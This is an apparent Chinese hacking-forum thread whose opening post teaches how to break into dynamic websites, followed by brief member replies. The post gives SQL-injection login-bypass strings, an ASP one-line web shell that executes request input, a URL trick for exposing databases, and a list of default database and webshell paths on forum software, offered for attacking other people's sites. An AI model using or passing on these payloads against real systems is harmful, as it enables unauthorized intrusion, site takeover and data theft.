WPE|52wpe|我爱WPE

注册会员
搜索
  • 2689查看
  • 7回复

禁止访问

首先,观察指定网站。
入侵指定网站是需要条件的:
要先观察这个网站是动态还是静态的。
首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站点
如果是静态的(.htm或html),一般是不会成功的。

如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。

Quote:
以下是入侵网站常用方法:
1.上传漏洞
如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传. 

2.注入漏洞
字符过滤不严造成的

3.暴库:把二级目录中间的/换成%5c 

4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:
 ’or’’=’ " or "a"="a   ’) or (’a’=’a   ") or ("a"="a  or 1=1--  ’ or ’a’=’a

5.社会工程学。这个我们都知道吧。就是猜解。

6.写入ASP格式数据库。就是一句话木马〈%execute request("value")%〉 (数据库必需得是ASP或ASA的后缀)

7.源码利用:一些网站用的都是网上下载的源码.有的站长很懒.什么也不改.
比如:默认数据库,默认后台地址,默认管理员帐号密码等

8.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp

/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:网站猎手 挖掘鸡 明小子

金牌会员

看不懂。。

金牌会员

下个工具尝试下,谢谢楼主啊!

金牌会员

现在漏洞都封完了 还有漏洞么~~~

金牌会员

呵呵,谢谢你发的

高级会员

漏洞还可以多点`...................

金牌会员

一点也不明白,写个教程呗

金牌会员

1# 血染天下无敌

专业术语太多 讲了等于没讲

快速发帖